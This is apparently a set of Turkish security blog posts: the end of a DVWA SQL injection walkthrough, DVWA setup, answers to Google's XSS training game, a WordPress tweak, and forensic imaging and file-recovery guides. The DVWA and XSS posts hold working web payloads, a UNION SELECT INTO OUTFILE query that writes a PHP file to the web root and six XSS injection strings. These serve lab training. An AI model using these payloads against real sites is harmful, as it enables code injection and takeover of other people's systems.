<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/09/veri-cekme.png"><img class="alignnone size-full wp-image-504" src="http://www.gurelahmet.com/wp-content/uploads/2015/09/veri-cekme.png" alt="veri cekme" width="737" height="575" /></a></p>
<p><strong>SORGU İLE DOSYA EKLEME</strong></p>
<p>[php] 1’ UNION SELECT ‘<?php echo "ahmet gurel";’,’?>’ INTO OUTFILE ‘/var/www/html/dvwa/ahmet.php’ # [/php]</p>
<p>sorgusu ile <strong>ahmet.php</strong> dosyası oluşturup içine küçük bir php kodu ekledik.Buraya daha farklı kodlar ve sayfalar oluşturabiliriz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/09/veri-ekleme.png"><img class="alignnone size-full wp-image-505" src="http://www.gurelahmet.com/wp-content/uploads/2015/09/veri-ekleme.png" alt="veri ekleme" width="1012" height="709" /></a></p>
<p> </p>
<p>Sorgumuz çalıştı ve<strong> ahmet.php</strong> dosyası oluştu.Bu dosyaya <strong>127.0.0.1/dvwa/ahmet.php</strong> adresine gittiğimde görüyorum.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/09/ver-ekleme2.png"><img class="alignnone size-full wp-image-506" src="http://www.gurelahmet.com/wp-content/uploads/2015/09/ver-ekleme2.png" alt="ver ekleme2" width="1014" height="700" /></a>Burada <strong>admin admin ahmet gurel y</strong>azıyor aslında biz php kodumuzda sadece ahmet gurel yazmıstık.Bunun nedeni <strong> UNION</strong> dan önceki 1’ çalıştığında ilk kullanıcıyı admin admin döndürüp koda eklemesinden kaynaklanıyor.</p>
<p>Birde bu dosya ekleme saldırısını yapmaya çalıştığında okuma ve yazma yetkiniz yok gibi bir hata alıyorsanız.Linuxta <strong>dvwa</strong> nın bulunduğu yere aşağıdaki resimdeki gibi okuma ve yazma izni vererek bu saldırı metodunu deneyebilirsiniz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/09/izin.png"><img class="alignnone size-full wp-image-507" src="http://www.gurelahmet.com/wp-content/uploads/2015/09/izin.png" alt="izin" width="1008" height="639" /></a></p>
<p> </p>
<p> </p>
<p>Gördüğünüz gibi SQL Injection açığı bulunan bir sistemde veritabanı isminden,tablo isimlerine,tabloların kolon isimlerine,kullanıcı adlarına,şifrelerine gibi tüm veritabanı bilgilerini çektik ve kendimiz dosya oluşturup içine kendi kodumuzu çalıştırdık.SQL Injection saldırısının ne kadar tehlikeli olabileceğinin yanında nasıl yapıldığını neler yapabileceğimizi birlikte bu sistem üzerinde manuel olarak inceledik.SQL bilgimiz ne kadar iyiyse o kadar fazla saldırı metodu oluşturup çok daha farklı şeyler yapmak bizim elimizde.Tabiki SQL Injection dendiğinde çoğu kişi bunu manuel değilde <strong>SQL MAP</strong> ile yapmakta.Burdaki sistemde kendinizi geliştirip mantığını anladıktan sonra<strong> SQL MAP</strong> i öğrenip kullanmanızı tavsiye ederim.Bunun dışında işinize web açıklarını ararken,test ederken Firefox ve Chrome üzerinde bir çok eklenti bulunmakta.Pentesterlar için Firefox eklentileri adlı yazıya <a href="http://www.unluagyol.com/2013/12/pentestlerde-kullanlacak-firefox.html">buradan</a> ulaşıp inceleyebilirsiniz.Bir başka yazıda görüşmek üzere…</p>
<p> </p>
DVWA Nedir ve Linux'a(Kali) Kurulumu2015-08-31T01:38:00+00:00ahmetgurel.github.io/brute%20force/command%20execution/csrf/dvwa/dvwa%20nas%C4%B1l%20kurulur/dvwa%20nedir/file%20inclusion/kali%20linux%20dvwa/kaliye%20dvwa%20kurulumu/qwb%20dvwa/siber%20g%C3%BCvenlik/sql%20injection/upload/web%20uygulama%20g%C3%BCvenli%C4%9Fi/web%20uygulama%20guvenl%C4%B1g%C4%B1/xss%20reflected/xss%20stored/2015/08/31/dvwa-nedir-ve-linuxakali-kurulumu<p><span style="color: #000000;"><strong>Damn Vulnerable Web Application (DVWA) Nedir?</strong></span></p>
<p><span style="color: #000000;">Web uygulama güvenliği alanında kendini geliştirmek isteyen pentesterlar ve güvenlik ile uğraşan kimseler için PHP ile oluşturulmuş içinde belli web zafiyetlerini barındıran bir eğitim sistemidir.</span></p>
<p><strong><span style="color: #000000;">Barındırdığı Zafiyetler:</span></strong></p>
<p><span style="color: #000000;">- Brute Force</span>
<span style="color: #000000;">- Command Execution</span>
<span style="color: #000000;">- CSRF</span>
<span style="color: #000000;">- File Inclusion</span>
<span style="color: #000000;">- SQL Injection</span>
<span style="color: #000000;">- Upload</span>
<span style="color: #000000;">- XSS Reflected</span>
<span style="color: #000000;">- XSS Stored</span></p>
<p><span style="color: #000000;">DVWA Sisteminde 3 tane zorluk seçeneği vardır.Bunlar low,medium ve high dır.</span></p>
<p> </p>
<p><span style="color: #000000;"><strong>Damn Vulnerable Web Application (DVWA) Kali Linux’a Kurulumu</strong></span></p>
<p><span style="color: #000000;">Öncelikle <strong>service apache2 start </strong> ve<strong> service mysql start</strong> komutları ile apache ve mysql servislerini başlatıyoruz.</span></p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/08/000.png"><img class="alignnone size-full wp-image-478" src="http://www.gurelahmet.com/wp-content/uploads/2015/08/000.png" alt="000" width="1010" height="641" /></a></p>
<p> </p>
<p><span style="color: #000000;">Sonra <strong>cd /var/www k</strong>omutunu kullanarak /www dizinine geliyoruz.</span></p>
<p><span style="color: #000000;">Ve <strong> git clone https://github.com/RandomStorm/DVWA.git dvwa</strong> komutunu çalıştırarak DVWA dosyasını dvwa klasörünün içine git ile kopyalıyoruz.</span></p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/08/0001.png"><img class="alignnone size-full wp-image-479" src="http://www.gurelahmet.com/wp-content/uploads/2015/08/0001.png" alt="0001" width="1010" height="635" /></a></p>
<p><span style="color: #000000;">Daha sonra <strong>leafpad dvwa/config/config.inc.php</strong> konfigurasyon dosyasını açarak password kısmını silip boş bırakarak kaydedip çıkıyoruz.</span></p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/08/002.png"><img class="alignnone size-full wp-image-480" src="http://www.gurelahmet.com/wp-content/uploads/2015/08/002.png" alt="002" width="1013" height="707" /></a></p>
<p> </p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/08/003.png"><img class="alignnone size-full wp-image-481" src="http://www.gurelahmet.com/wp-content/uploads/2015/08/003.png" alt="003" width="996" height="713" /></a><span style="color: #000000;">Daha sonra internet tarayıcımıza <strong>127.0.0.1/dvwa</strong> yazıp gittiğimizde DVWA ın kurulum ve veri tabanı oluşturma sayfası gelmektedir.</span></p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/08/005.png"><img class="alignnone size-full wp-image-482" src="http://www.gurelahmet.com/wp-content/uploads/2015/08/005.png" alt="005" width="1010" height="687" /></a></p>
<p> </p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/08/0005.png"><img class="alignnone size-full wp-image-483" src="http://www.gurelahmet.com/wp-content/uploads/2015/08/0005.png" alt="0005" width="996" height="717" /></a></p>
<p> </p>
<p><span style="color: #000000;">Ve son olarak bu adımları tamamlayıp internet tarayıcımıza <strong>127.0.0.1/dvwa</strong> tıkladığımız login ekranı gelmektedir.</span></p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/08/006.png"><img class="alignnone size-full wp-image-484" src="http://www.gurelahmet.com/wp-content/uploads/2015/08/006.png" alt="006" width="1015" height="713" /></a></p>
<p> </p>
<p><span style="color: #000000;">Gelen login ekranına Username kısmına<strong> admin</strong> Password kısmınada <strong>password </strong>girerek sisteme giriş yapıyoruz.</span></p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/08/abc.png"><img class="alignnone size-full wp-image-485" src="http://www.gurelahmet.com/wp-content/uploads/2015/08/abc.png" alt="abc" width="1001" height="729" /></a><span style="color: #000000;">Son adımdan sonra sistem bu şekilde karşımızda olacak ve istediğimiz leveli ve bölümleri seçerek kendinizi geliştirip deneyebilirsiniz.Bir başka yazıda görüşmek üzere :)</span></p>
<p> </p>
<p> </p>
<p> </p>
Google XSS Oyunu ve Cevapları2015-08-27T17:45:00+00:00ahmetgurel.github.io/cross%20site%20scripting/google/google%20xss/google%20xss%20oyunu%20ve%20cevaplar%C4%B1/siber%20g%C3%BCvenlik/web%20uygulama%20g%C3%BCvenli%C4%9Fi/xss/2015/08/27/google-xss-oyunu-ve-cevaplar%c4%b1<p>Bu sene <a href="https://kamp.linux.org.tr/2015/">Linux Yaz Kampında</a> Web Uygulama Güvenliği ve Güvenli Kod Geliştirme kursuna katılma şansı yakaladım.Teoride bildiğim bir çok şeyi uygulama,deneme fırsatı yakaladım.Bunun dışında bir çok yeni bilgil öğrendim.İmkanı olan bilgisayar ve bilişim ile ilgili bölüm okuyan,ilgi duyan herkesin bir kere Linux Yaz Kampına katılıp eğitim alması gerektiğine inanmaktayım.15 Gün boyunca sabah 9,30 akşam 9,30 eğitici ve eğlenceli bir ortam sunmakta.Bu seneki kursu veren hocalarıma <a href="https://www.mehmetince.net/">Mehmet Dursun Ince</a>,<a href="https://twitter.com/Barknkilic">Barkın Kılıç</a>,<a href="https://twitter.com/abilgegunduz">Ayşe Bilge Gündüz </a>ve misafir eğitmenimiz <a href="https://twitter.com/ucarozan">Ozan Uçar</a>‘a ve kursun bir diğer misafir eğitmeni <a href="http://omercitak.com/">Ömer Çıtak’</a>a teşekkür ederim.</p>
<p>Şimdi gelelim asıl konumuza :) Tabiki Google’ın XSS oyunu ve Cevapları kamp esnasında XSS anlatıldıktan sonra çözmemiz istendi.Bende Soruları geçerken ki yazdığım payloadları blogumdan paylaşmak istedim :) Tabi hepsini kendim çözmedim.Soruları araştırıp çoğu konuyu beraber öğrendiğimiz sevgili ev arkadaşım,en yakın arkadaşlarımdan <a href="http://onurgurbuz.blogspot.com/">Onur Gürbüz</a>‘e de teşekkür ederim :)</p>
<p>Google XSS Oyunu,6 soruluk ve her soruda farklı bir XSS Zaafiyetini ele alan bir sistem. <a href="https://xss-game.appspot.com/">https://xss-game.appspot.com/</a> adresine giderek hemen çözmeye başlayabilirsiniz.</p>
<p><strong>Soru 1 </strong></p>
<p>[php]<script>alert(1)</script> [/php]</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/08/11.png"><img class="alignnone size-large wp-image-463" src="http://www.gurelahmet.com/wp-content/uploads/2015/08/11-1024x580.png" alt="1" width="976" height="553" /></a></p>
<p> </p>
<p><strong>Soru 2</strong></p>
<p>[php]<img src="" onerror=alert(1)>[/php]</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/08/21.png"><img class="alignnone size-large wp-image-464" src="http://www.gurelahmet.com/wp-content/uploads/2015/08/21-1024x570.png" alt="2" width="976" height="543" /></a></p>
<p> </p>
<p> </p>
<p><strong>Soru 3</strong></p>
<p>[php] ’)"><script>alert(1);</script> [/php]</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/08/31.png"><img class="alignnone size-large wp-image-465" src="http://www.gurelahmet.com/wp-content/uploads/2015/08/31-1024x584.png" alt="3" width="976" height="557" /></a></p>
<p> </p>
<p><strong>Soru 4</strong></p>
<p>[php] ’); alert(1) // [/php]</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/08/4.png"><img class="alignnone size-large wp-image-466" src="http://www.gurelahmet.com/wp-content/uploads/2015/08/4-1024x579.png" alt="4" width="976" height="552" /></a></p>
<p> </p>
<p><strong>Soru 5</strong></p>
<p>[php] javascript:alert(1) [/php]</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/08/5.png"><img class="alignnone size-large wp-image-467" src="http://www.gurelahmet.com/wp-content/uploads/2015/08/5-1024x644.png" alt="5" width="976" height="614" /></a></p>
<p> </p>
<p><strong>Soru 6</strong></p>
<p>[php] //www.google.com/jsapi?callback=alert [/php]</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/08/6.png"><img class="alignnone size-large wp-image-468" src="http://www.gurelahmet.com/wp-content/uploads/2015/08/6-1024x560.png" alt="6" width="976" height="534" /></a></p>
<p> </p>
<p> </p>
<p><strong>Success!!</strong></p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/08/TheEnd.png"><img class="alignnone size-large wp-image-469" src="http://www.gurelahmet.com/wp-content/uploads/2015/08/TheEnd-1024x554.png" alt="TheEnd" width="976" height="528" /></a></p>
WordPress Siteye Index.html Giriş Sayfası Oluşturma2015-08-26T13:20:00+00:00ahmetgurel.github.io/.htaccess/canonical.php/index/index%20sayfas%C4%B1%20olusturma/wordpress/wordpress%20de%20giri%C5%9F%20sayfas%C4%B1%20olu%C5%9Fturmak/wordpress%20%C4%B1ndex%20olusturma/wp-includes/canonical.php/2015/08/26/wordpress-siteye-index-html-sayfas%c4%b1-ekleme<p>WordPress sitenize sizde bir giriş sayfası oluşturmak isterseniz benim izlediğim yolu izleyerek yapabilirsiniz.Şimdi öncelikle index.html dosyası oluşturarak istediğiniz giriş sayfasını oluşturmalısınız.Daha sonra bu dosyaya FTP nize yukleceksiniz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/08/1.png"><img class="alignnone size-full wp-image-444" src="http://www.gurelahmet.com/wp-content/uploads/2015/08/1.png" alt="1" width="1006" height="312" /></a></p>
<p>Buraya kadar olan kısım basit peki şimdi bu dosyayı wordpress nasıl tanıyacak yada asıl sitenize nasıl yönlendirecek asıl sorun burada başlıyor.Genelde oluşturduğumuz index.html sayfası açılıyor fakat yönlendirme sorunları çıkıyor.Bunun içinde iki tane dosyayı duzenleyerek bu sorunu çözmekteyiz.</p>
<p><strong>1-</strong> İlk olarak <strong>.htaccess </strong>dosyasına <strong>DirectoryIndex index.html index.php </strong>satırını ekliyoruz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/08/2.png"><img class="alignnone size-full wp-image-445" src="http://www.gurelahmet.com/wp-content/uploads/2015/08/2.png" alt="2" width="1023" height="403" /></a></p>
<p><strong>2- wp-includes/canonical.php</strong> <strong> </strong>dosyasını açıyoruz.Aşağıdaki yeri buluyoruz.</p>
<p>[php]
// Some PHP setups turn requests for / into /index.php in REQUEST_URI
// See: http://trac.wordpress.org/ticket/5017
// See: http://trac.wordpress.org/ticket/7173
// Disabled, for now:
// $original[‘path’] = preg_replace(‘|/index.php$|’, ‘/’, $original[‘path’]);[/php]</p>
<p>Daha sonra en alt satırdaki kodu yorum satırından çıkarıyoruz.</p>
<p>[php]
// Some PHP setups turn requests for / into /index.php in REQUEST_URI
// See: http://trac.wordpress.org/ticket/5017
// See: http://trac.wordpress.org/ticket/7173
// Disabled, for now:
$original[‘path’] = preg_replace(‘|/index.php$|’, ‘/’, $original[‘path’]); [/php]</p>
<p><img class="alignnone size-large wp-image-449" src="http://www.gurelahmet.com/wp-content/uploads/2015/08/3-1024x537.png" alt="3" width="976" height="512" /></p>
<p>Bu adımları tamamladıysanız başarılı bir şekilde index.html giriş sayfanız oluşmuştur güle güle kullanın :)</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/08/Screenshot-from-2015-08-26-133538.png"><img class="alignnone size-large wp-image-453" src="http://www.gurelahmet.com/wp-content/uploads/2015/08/Screenshot-from-2015-08-26-133538-1024x519.png" alt="Screenshot from 2015-08-26 13:35:38" width="976" height="495" /></a></p>
Adli Bilişim Nedir?2015-07-15T17:56:00+00:00ahmetgurel.github.io/adli%20bili%C5%9Fim/adli%20bili%C5%9Fim%20ara%C3%A7lar%C4%B1/adli%20bili%C5%9Fim%20sertifikalari/adli%20bili%C5%9Fim%20uzman%C4%B1%20nas%C4%B1l%20olanur/data%20recovery/forensics/hard%20diskten%20veri%20kurtarma%20program%C4%B1/siber%20g%C3%BCvenlik/veri%20kurtarma/2015/07/15/adli-bili%c5%9fim-nedir<p>Bu döküman Adli Bilişim Nedir?,Adli Bilişim Uzmanı ne yapar?Nasıl Adli Bilişim Uzmanı olunur ve hangi sertifakalar alınır gibi temel konuları anlatmak için hazırlanmıştır.Sunumda Adli Bilişimde kullanılan araçların isimlerinede yer verilmiştirSiber Güvenliğin alt dalı olan Adli Bilişim alanında fikir sahibi olmak yada ne iş yaptıklarıyla iligli bir fikir oluşturmak adına hazırlanmıştır.Sunum sonunda faydalandığım güzel kaynakları belirttim sunumdan sonra o siteleri ziyaret edip daha güzel yazıları okuyabilirsiniz.Umarım işinize yarayan bir sunum olur :)</p>
<iframe width="476" height="400" src="https://www.slideshare.net/slideshow/embed_code/key/4hlo3A7chcd6Tt" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-65335586-1', 'auto');
ga('send', 'pageview');
</script>
Linux'ta DD ile İmaj Alma ve İmajın Canlandırılması2015-07-08T15:09:00+00:00ahmetgurel.github.io/adli%20bili%C5%9Fim/dd/forensics/image/imaj%20alma/linux/linux%20dd/siber%20g%C3%BCvenlik/2015/07/08/linuxta-dd-ile-imaj-alma-ve-imaj%c4%b1n-canland%c4%b1r%c4%b1lmas%c4%b1<p><strong>İmaj Almak Neden Önemli?</strong></p>
<p>Öncelik ile neden format atılmış bir diskin imajını alıp recovery yapıyoruz da, direkt olarak bu diskimizin üzerinde recovery programlarını kullanmıyoruz ?</p>
<p>Çünkü kullandığımız programlar diskteki verilerin bilgilerinin tutulduğu metadata bilgilerini değiştirir.Bir programla kurtaramayacağımız verileri başka bir programla kurtarmak bazen mümkün olabiliyor.Bunun için orjinal diskin metadata larını değiştirmemek zarar vermemek için imaj alıp imaj üzerinden işlem yaparız.</p>
<p><strong>İmaj Almak</strong></p>
<p>Disklerimizin imajlarını fiziksel ve yazılımsal olarak alabiliriz.</p>
<p><strong>Fiziksel İmaj Alma Cihazları</strong></p>
<p>Bu cihazlar temel prensip olarak biri imajı alınacak disk diğeride imajın kaydedileceği boş disk olarak iki diski araçlara bağlayarak imaj alır.</p>
<p><strong>Bu cihazlardan bazıları:</strong></p>
<p><strong>DIBS RAID (Rapid Action Imaging Device)</strong></p>
<p>[caption id=”attachment_368” align=”alignnone” width=”451”]<a href="http://www.gurelahmet.com/wp-content/uploads/2015/07/DIBS-RAID-Rapid-Action-Imaging-Device.jpg"><img class="size-full wp-image-368" src="http://www.gurelahmet.com/wp-content/uploads/2015/07/DIBS-RAID-Rapid-Action-Imaging-Device.jpg" alt="DIBS RAID (Rapid Action Imaging Device)" width="451" height="475" /></a> DIBS RAID (Rapid Action Imaging Device)[/caption]</p>
<p><strong>Image MASSter Solo III</strong></p>
<p>[caption id=”attachment_369” align=”alignnone” width=”600”]<a href="http://www.gurelahmet.com/wp-content/uploads/2015/07/Image-MASSter-Solo-III.jpg"><img class="size-full wp-image-369" src="http://www.gurelahmet.com/wp-content/uploads/2015/07/Image-MASSter-Solo-III.jpg" alt="Image MASSter Solo III" width="600" height="400" /></a> Image MASSter Solo III[/caption]</p>
<p><strong>Logicube</strong></p>
<p>[caption id=”attachment_370” align=”alignnone” width=”220”]<a href="http://www.gurelahmet.com/wp-content/uploads/2015/07/Logicube.jpg"><img class="size-full wp-image-370" src="http://www.gurelahmet.com/wp-content/uploads/2015/07/Logicube.jpg" alt="Logicube" width="220" height="353" /></a> Logicube[/caption]</p>
<p><strong>Tableau</strong></p>
<p>[caption id=”attachment_371” align=”alignnone” width=”600”]<a href="http://www.gurelahmet.com/wp-content/uploads/2015/07/Tableau.jpg"><img class="size-full wp-image-371" src="http://www.gurelahmet.com/wp-content/uploads/2015/07/Tableau.jpg" alt="Tableau" width="600" height="381" /></a> Tableau[/caption]</p>
<p><strong>Yazılımsal İmaj Alma Programları</strong></p>
<p> </p>
<p>Safeback v3
Forensic Replicatorv 3.1
PDA Seizure v 3.0.1.35
Pdd (Palm dd, Windows, Free)
Forensic Toolkit (FTK) v 1.50
WinHex v 12.0NTI
Image (DOS)
SMART (Linux Redhat)
ByteBack (DOS) v 3
Anadisk v 2.10
ILook v 8.0.8AIR-(Linux-Free)
Automated Image & Restore
Forensic Explorer
Sans</p>
<p>Imaj almaya yarayan bazı araçlar bunlardır.Bunların dışında ben bu yazımda linuxta DD ile imaj almayı anlatacağım.Bu yazıda linux ta bir usb belleğin imajını alıp o imajı ayağa kaldıracağız.</p>
<p><strong>Linux’ta DD ile Imaj Alma</strong></p>
<p>DD sabit bir diskin,usb belleğin,cd nin yada dvd nin imajını alabilir.Aldığınız bu imajı sisteme mount ederekte usb bilgisayarımıza takılıymış gibi açabilir yada verilerimizi kurtarabiliriz.</p>
<p>DD alt seviye kopyalama yapar yanı diskimizinboş alanlarda dahil tamamının kopyalayıp imajını alır.<strong>Yani disk boyutu ile imaj boyutu aynı olmalıdır.</strong></p>
<p>DD komutu if ve of olmak üzere iki temel parametre alır. Diğer parametreler ise isteğe bağlıdır.<strong>If</strong> bilgisi burada kaynak aygıt/partition u, <strong>of</strong> ise hedefi göstermektedir.</p>
<p>Bunun dışında <strong>bs </strong>kaçar byte kopyalanacağını belirtir.<strong>conv=noerror </strong>ise hata alsan bile kopyalamaya devam et demeye yarar.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/07/11.png"><img class="alignnone size-full wp-image-372" src="http://www.gurelahmet.com/wp-content/uploads/2015/07/11.png" alt="1" width="985" height="609" /></a></p>
<p>Öncelikle burada sudo fdisk -l komutu ile flash belleğimizin yolunu bulduk bunun dışında diske nerden yazılmaya başlandığı (Start 2048) bitişi (End=798176) Diskin formatı gibi bilgileri edindik.Burada sdb flash bellleğimizi sdb1 ise onun bir partition göstermektedir.Bu yüzden imaj alırken diskimizin tamamını yanı sdb nin imajını almalıyız.</p>
<p>Daha sonra ise <strong>sudo dd if=/dev/sdb of=/home/ahmetDesktop/disk.img bs=10M conv=noerror</strong> komutu ile diskimizin imajını masaüstüne aldım burada durum dd çalışırken bir çıktı vermez burada çalışmıyor diye kapatmayın iptal etmeyin işlem bittiğinde çıktı verecektir.Komutu çalıştırdığımızda bir değişiklik olmayacak aşağıdaki resimde gördüğünğünüz gibi sadece masaütüne ismini verdiğimiz disk.img gelecektir.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/07/21.png"><img class="alignnone size-large wp-image-373" src="http://www.gurelahmet.com/wp-content/uploads/2015/07/21-1024x524.png" alt="2" width="976" height="499" /></a></p>
<p> </p>
<p>Işlem bittiğinde ise aşağıdaki gibi bir çıktı alacağız.Bu başarı ile imajımızın alındığını göstermektedir.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/07/31.png"><img class="alignnone size-large wp-image-374" src="http://www.gurelahmet.com/wp-content/uploads/2015/07/31-1024x582.png" alt="3" width="976" height="555" /></a></p>
<p>Artık flash belleğimizin imajını aldık şimdi bu imajı açmamız içini görmek istiyorsak imaj açma toolları kullanabiliriz.Ben linuxta aldığım imajı mount ederek açacağım.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/07/41.png"><img class="alignnone size-large wp-image-375" src="http://www.gurelahmet.com/wp-content/uploads/2015/07/41-1024x884.png" alt="4" width="976" height="843" /></a></p>
<p>Yukarıda gördüğünüz gibi önce Desktop(Masaüstü) a gelerek mkdir ile imajac diye boş bir klasör oluşturdum.<strong>sudo mount -o offset=1048576 /home/ahmet/Desktop/disk.img /home/ahmet/Desktop/imajac/ </strong>komutu ile de disk.img adlı imaj dosyamı imajac adlı klasöre mount ettim.Artık imajac klasörüne tıkladığımızda imajımıza ulaşıyoruz.Burada mount komutu ile ilgili <strong>offset </strong>önemli offset değerini kendimiz hesaplıyoruz ilk resimdeki <strong>sudo fdisk -l </strong>komutunun çıktısındaki diskin yazılmaya başlandığı değeri start değeri 2048 idi.Sector size 512 idi.Bu iki sayıyı çarptığımızda 2048x512=1048576 bizim offset değerimiz oluyor.Flash belleğimizin imajını aldık ve imajını açtık gördüğünüz gibi flash bellek boş çıktı.Daha önce silinen veriler var ise bunuda başka araçlar üzerinden imajımızdan ulaşabilriz.Böyle bir şeye gerek duyarsanız <a href="http://www.gurelahmet.com/linuxta-scalpel-ile-silinmi%C5%9F-dosya-kurtarma/">Linux’ta Scalpel ile Silinmiş Dosya Kurtarma</a> adlı yazımı inceleyebilirsimiz.Umarım faydalı bir yazı olmuştur.Soru ve önerilerinizi yorum kısmından veya mail ile ulaşabilrisiniz.</p>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-65335586-1', 'auto');
ga('send', 'pageview');
</script>
Linux'ta Scalpel ile Silinmiş Dosya Kurtarma2015-07-05T11:46:00+00:00ahmetgurel.github.io/adli%20bili%C5%9Fim/data%20recovery/forensics/linux/linux%20recovery/recovery/scalpel/scalpel%20recovery/siber%20g%C3%BCvenlik/silinen%20dosyalari%20kurtarma/2015/07/05/linuxta-scalpel-ile-silinmi%c5%9f-dosya-kurtarma<p>Scalpel sisteminizden,harici disklerinizden her hangi bir nedenle silinen dosyalarınızı kurtarmanızı sağlayabilen küçük,hızlı ve kullanışlı bir araçtır.Bu yazımda kurulumu ve nasıl kullanıldığını anlatmaya çalışacağım.</p>
<p>Öncelikle <strong>sudo apt-get install scalpel</strong> komutu ile sistemimize kuruyoruz.Paket depoları dağıtımtan dağıtıma farklılık gösterir debian tabanlı bir dağıtım kullanmıyorsanız paket yöneticisi farklı olacaktır.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/07/1.png"><img class="alignnone size-full wp-image-358" src="http://www.gurelahmet.com/wp-content/uploads/2015/07/1.png" alt="scalpel" width="562" height="336" /></a></p>
<p> </p>
<p>Scalpel i sistemimize kurduktan sonra <strong>sudo vim /etc/scalpel /scalpel.conf </strong> diyerek scalpel in ayar dosyasını açıyoruz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/07/2.png"><img class="alignnone size-full wp-image-359" src="http://www.gurelahmet.com/wp-content/uploads/2015/07/2.png" alt="2" width="561" height="354" /></a></p>
<p>Ben ayar dosyasını vim ile açtım siz vi,nano,gedit gibi editörler ilede açabilirsiniz.vim kurulu olarak gelmemekte bir live cd ile çalıştığınızda vim i kurmadıysanız bu komut hata verecektir.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/07/3.png"><img class="alignnone size-full wp-image-360" src="http://www.gurelahmet.com/wp-content/uploads/2015/07/3.png" alt="3" width="566" height="501" /></a></p>
<p>Şimdi scalpel in ayar dosyasında bolca # (diyez) işareti görmekteyiz.Bunlarda yorum satırı olarak algılanıp çalışmamaktadır.Kurtarmak istediğiniz dosya formatının önündeki #(diyez) işaretlerini kaldırarak arama esnasında o uzantılı dosyayı arayıp kurtarmasını sağlayacağız.Ayar dosyasında gördüğünüz y nin yanındakiler bytes olarak dosyanın büyüklüğüdür.Daha büyük dosyaları aramayacaktır onuda değiştirmek elinizdedir.Son olarak #(diyez) i kaldırıp vim in :wq komutu ile dosyayı kaydetip ve çıktım.Bundan sonrası istediğimiz disk,kurtarılcak alanı gösterip dosylarımızı kurtarmaya kaldı.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2015/07/4.png"><img class="alignnone size-large wp-image-361" src="http://www.gurelahmet.com/wp-content/uploads/2015/07/4.png" alt="4" width="558" height="348" /></a></p>
<p> </p>
<p><strong>sudo scalpel /dev/sda1 -o /home/ahmet-gurel/Desktop/output </strong>diyerek scalpel i sda1 disk bölümündeki .jpg ve .png uzantılı silinmiş dosyaları arayarak kurtardığı dosyaları masaüstünde output adlı bir klasöre kaydetmiştir.Diskin büyüklüğüne göre tarama ve kurtarma işlemi uzayacaktır ben deneme amaçlı 100 mb lık küçük bir alanı taradım genel anlamda kullanımı bu şekildedir. -o parametresinden sonraki kısım kurtarılan dosyaların nereye kaydedileciğini göstermektedir istediğiniz gibi bir yol klasör verebilirsiniz.</p>
<p>Silinen dosyalarınızı kurtarmak için bir çok başka araç mevcuttur.</p>
<p>ENCASE
FTK
Restorer
R-Studio
PC Inspector™ File Recovery
Active Partition Recovery
Scalpel bunlardan bazılarıdır.Encase ve FTK adli bilişim analizlerinde en çok kullanılan programlardır.Scalpel ın kurtaramadığı bulamadığı büyük veri kayıpları için diğer araçları deneyebilirsiniz.</p>
<p>Umarım işinize yarayan bir yazı olmuştur sorularınızı yorum ve mail olarak atabilirsiniz :)</p>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-65335586-1', 'auto');
ga('send', 'pageview');
</script>
